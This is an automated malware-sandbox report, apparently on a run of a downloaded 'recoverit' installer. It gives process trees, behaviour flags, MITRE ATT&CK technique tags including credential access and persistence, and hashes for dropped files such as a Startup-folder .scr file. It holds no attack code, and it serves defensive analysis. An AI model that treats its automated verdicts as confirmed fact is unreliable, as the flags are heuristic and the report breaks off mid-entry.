  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3972 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:1
  2⤵
  PID:1824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:8
  2⤵
  PID:2452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:8
  2⤵
  PID:1728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4800 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:8
  2⤵
  PID:3152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:8
  2⤵
  PID:3768

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xf8,0x12c,0x7ffb50dc46f8,0x7ffb50dc4708,0x7ffb50dc4718
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 /prefetch:3
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:8
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:2900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:5080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:8
  2⤵
  PID:388
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:8
  2⤵
  PID:2780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:4320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
  2⤵
  PID:2716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6140 /prefetch:8
  2⤵
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5936 /prefetch:8
  2⤵
  - Modifies registry class
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5640 /prefetch:8
  2⤵
  PID:2672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6840 /prefetch:8
  2⤵
  PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6964 /prefetch:8
  2⤵
  PID:2480
- C:\Users\Admin\Downloads\recoverit_setup_full4174.exe
  "C:\Users\Admin\Downloads\recoverit_setup_full4174.exe"
  2⤵
  - Executes dropped EXE
  - Modifies Control Panel
  - Suspicious use of SetWindowsHookEx
  PID:372
- - C:\Users\Public\Documents\Wondershare\NFWCHK.exe
    C:\Users\Public\Documents\Wondershare\NFWCHK.exe
    3⤵
    - Executes dropped EXE
    PID:5472
- C:\Users\Admin\Downloads\recoverit_setup_full4174.exe
  "C:\Users\Admin\Downloads\recoverit_setup_full4174.exe"
  2⤵
  - Executes dropped EXE
  PID:2480
- C:\Users\Admin\Downloads\recoverit_setup_full4174.exe
  "C:\Users\Admin\Downloads\recoverit_setup_full4174.exe"
  2⤵
  - Executes dropped EXE
  PID:5916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,13210624154802383652,8172633562641244479,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3132 /prefetch:2
  2⤵
  PID:5712

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎ .scr

Filesize
12.5MB

MD5
637a214e92b7bfd20ea382ec7305ca1b

SHA1
c1da5b2ca143179947c87eb73cf1922412463f43

SHA256
0af2bce0e477fcfbd758fccc38940f9d09c33365646e2d90178cdbbad215da11

SHA512
5543f96f4bbfe6ef8d97db01fdc5c0934d5b9afbad95176973e067ad901c3a621c6be2eb972c804626597efc1606a19202bff88c869890973eeb0b9cdf4fbcf0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
245e426daab721fa9fcf894c80049aaf

SHA1
acfa12fea43d5d866abde22a71cadd333f3e34d0

SHA256
e0e2d0074595b741d55b949089c9669eb6af448cfa6fb78cee7f15c3be6cc6dc

SHA512
fb9e7daa1529482db4d37b98f642fd228d3000c8c0d0880fa5a6107cf6cff00e9b08e7ee200826d0b22562dfc7e063a2d45ff94c7d79948bab727885c76ad4ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
77427a455a5e599dbb060d71db780bcc

SHA1
ac8a56254be26ac292c4869821e44c5f0282e721

SHA256
970718e29b96c6c96b6652eb68dec0cf81fc390e51a7f48cb411954ed2d81d18

SHA512
08f8e5a19350eb9bc3b83086e8716f64cf4b6ae64fcaedf5a96dca477b918c6926d7ac51611272ee46d0ae6a6a43b5f0951858332556497e5af3f9f7bfc5ea75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
2e8ad3d2f9c7f468582154440cb9c24c

SHA1
c9fb9f00306236219d3f3d615ab5d7a4a137c48c

SHA256
839ca70e01f847ca8c81cb68aeea1d3ea9fcefe09146040c85c51170d0184c03

SHA512
538ca22964f6da41cc65ae95a1ea6b23ebb848aa7611d7404a3d8258afde5e4e9ca820cdae4cebec95ef472260c9807852795505f4b81528038507a07260196e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
c589e0b16eb8f85cc934c67b306c7100

SHA1
ad4ab5b753479ce522d59ae68dc2a5654e674ed2

SHA256
6854b2025f3ba68be8b51300a304221b280cf71ec674fe71a49109fd7820a606

SHA512
5643ccb90d592997524979580de72fcc28ba2a912883779d33cc96324cfaa5631f723c6535f52236d28ca0e6b8f469391021b2c24795896c170b3691db9fd4c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
439b5e04ca18c7fb02cf406e6eb24167

SHA1
e0c5bb6216903934726e3570b7d63295b9d28987

SHA256
247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

SHA512
d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a8e767fd33edd97d306efb6905f93252

SHA1
a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

SHA256
c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

SHA512
07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
6bc0823337cd90339c62357857b87ee2

SHA1
ecff8134957ab60d7617e20a7fd9513473bfc326

SHA256
9ece10bba4d5622794fbc86e5aa64d8a7f7c0ae56701e86df9d730181505d9d6

SHA512
119648059e92951b389d68d962171b2510e6fb9399f105195e8c44aa5a92d50999a464c04cbcca75ce4bc3b4edaae78332125dcd8ac0bbbb61dd18d5a1bcd9bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
066275f45c88cc1885476a513bbfa386

SHA1
75a6f95102088bb807596c9420c6ea223ccbcb96

SHA256
2b37d2370ff5a10dad17693cc40cfa5ef80f5f53b46f3b26f179e796d8c9495d

SHA512
8d52e3d1e204a05f6c44bd7576e40ba6cbeec8728a830d2d2a0074592ad8248e7d629d54682c0b59b88e7178841750990fdb30a16774f10e86de2d93e203d71c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1c9c1894beb66bdf34205d54db36ad6b

SHA1
ed07212d7b76fa5c4c47dfc2b53956b970bf4628

SHA256
5022a43ee00f09286e61fe2ec95dd334621516544f298902a8622ad924ea4c97

SHA512
84b6c259cf956180992b1c18fe545c3277f7dd50b3671ad6e928fb76a8b42341866d8d22ebeadb6a0fbf32465948807f89e1c7779186e18af05abcf5bd7afda1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e00a5ed9085850b9031aff1e41a38a3f

SHA1
5c626c8928f40562fdbf12a43c6b295b2241b370

SHA256
b035c35e4734ffaab309d82a20aff392cf8cf2c284f3fd375cf74b97098d0987

SHA512
dece706d98fda421b94f7d3adaef70306cc97bec9b3dfebf0fbd515dd2f2bd036e93fd848366e204d36e1f294bc9423cd20ac80c6791b4ea9bdd32c0dc8b80cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
f9daa3d836355f7cf7e555a1e58336db

SHA1
4dd076f0b2260f24cb855d114193768f492b7a68

SHA256
c6fc6a46fb78453f15baf92cc27af977558c71f738883fd3be1ca2e460163b28

SHA512
8d73c6a096b54a289bbd8c02c54aa373da46695b99216da06d649d437868c6d669c938a60f05b431fbb90a20976b30f8eca5a4c6d95de9fb5d90a8d443402f18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\e089012ccb1ba94e417a260525dc4147ccc2fa02\index.txt

Filesize
100B

MD5
0ab4409ff67bb380bcc25f15dd323b7e

SHA1
16f477d7f4e94df6fc11c456cb03cf336f855a17

SHA256
45f38f366b3b45b119d39abb97916454bc4dd92fd37648c0f0854d924d1888d8

SHA512
b6b062241dd287cf88a84f1ba2bb272182486f950ca1dbf1c6f39a8f4f5f416c730c664cb85c8c164c2fafd4f4c92fde267d1f1236b883baa2745120e32a8788

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\e089012ccb1ba94e417a260525dc4147ccc2fa02\index.txt.tmp

Filesize
93B

MD5
452e1952de06e72cbbc01cac24b92d9d

SHA1
5e861a7d5bcf13af8db81ac81599c2bbaa1ffd73

SHA256
d46125490bc5b9f908037254bb457028e632b63e273949807bb57434ba20c094

SHA512
48654100ee6773dff7a4ddff3031c4e85744fff64bd0c6da4fc7e236cdbbfda2def2f46962ffd3bcfc5041fa93d90f57a938a9670c7a7fa7881387cdb13a068e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
969c7397f79b66c238be1f1f88be7f00

SHA1
1f5f6fce730e3af36e21181c986e23bdeb9429a5

SHA256
1177c7532ae727f503c525f12b70c57044681e6b6d0da2b78ccea9632d5f8637

SHA512
82ce534fdc17e720b1a36b6a781ba46771180c31a14c762d057dcc78abaf516ef9a618a0633cb5f703d4f8f32c75583505f33ada603420877a5d2fefc22fbdd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
202be9cb6e5964e93221ed2b245ba315

SHA1
e3a7db4a8abae37bb8b3377232f63e6c27499cea

SHA256
9018f4b890be373aeaf0e5e47b7f1ec053a7f0a4be285defdad60373b3bcdf86

SHA512
d6e6f103f5411c29918623d41ca1d80cdb0e2815ee14aafce484692479aff049dd00240c5b5854431ed2ecc46b929dfbc9eb9f7c41e041f7bf00c414aa095fdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afevplna.default-release\activity-stream.discovery_stream.json.tmp

Filesize
27KB

MD5
a613d5a08d86e4dbe960a1092caa677f

SHA1
7e3ce673aa9d0863b6b9341453f142dc7a3353ed

SHA256
f4a2a4f5d302eaa984bc8fe46c30db669dcd75a10b03c9da772c029797573200

SHA512
798d2008868b243d40aebe27ef8e3aaee990744fc800ac880b3e58f1fc44bd93c5ae691178eb54f7b461ddbdb48ab0d98c5efaca79285d2b3cd01ab901780312

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afevplna.default-release\cache2\doomed\11958

Filesize
38KB

MD5
7c6d092e8c7931814c620a2d558d6b57

SHA1
ba0c6fe3592b2e5274060aa384775f43379c2d5d

SHA256
33878dd9433b553481b3d9f162b18bd100dfa85387aeb0f3b0fb4ea18cb3e40a

SHA512
d1938c3c2e263c13815c6cf79ca57aa06d07415358ce6e64e549987565f0e5d9be2cfe8f5f042b8ffe175b49932178a842da57ee62eb68ca7b05c3577f29f477

Download Submit
C:\Users\Admin\AppData\Local\Temp\3dA3Lmni9o.tmp

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
